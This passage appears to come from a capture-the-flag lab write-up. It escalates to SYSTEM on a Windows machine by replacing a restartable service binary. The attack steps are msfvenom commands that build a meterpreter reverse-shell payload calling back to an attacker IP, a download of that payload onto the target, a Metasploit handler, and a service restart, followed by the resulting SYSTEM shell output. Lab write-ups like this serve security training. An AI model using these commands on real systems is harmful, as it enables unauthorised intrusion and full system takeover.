ServiceRights     : Start, Stop, PauseContinue, ReadControl
AccessControlType : AccessAllowed
IdentityReference : LAB-ENTERPRISE\bitbucket
IsInherited       : False
InheritanceFlags  : None
PropagationFlags  : None

ServiceRights     : QueryConfig, QueryStatus, EnumerateDependents, Interrogate, UserDefinedControl, ReadControl
AccessControlType : AccessAllowed
IdentityReference : NT AUTHORITY\INTERACTIVE
IsInherited       : False
InheritanceFlags  : None
PropagationFlags  : None
```

So `bitbucket` has permission to start and stop `zerotieroneservice`.

Let's generate a reverse shell:

```
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.25.199 LPORT=9999 -f exe --arch x86 --platform windows > Zero.exe
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.18.25.199 LPORT=9999 -f exe --arch x64 --platform windows > Zero.exe
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
```

Starting a web server to serve it:

```
$ ruby -run -ehttpd . -p8000
```

We can download it on the target:

```
PS C:\Users\bitbucket> cd 'C:\Program Files (x86)\Zero Tier\'
PS C:\Program Files (x86)\Zero Tier> wget http://10.18.25.199:8000/Zero.exe -o Zero.exe
```

We can start the reverse shell handler:

```
$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 9999; run"
```

Then restart the service:

```
PS C:\Program Files (x86)\Zero Tier> Stop-Service zerotieroneservice
PS C:\Program Files (x86)\Zero Tier> Start-Service zerotieroneservice
```

Then whe receive the connection:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 5720 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1817]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
THM{EDITED}
```

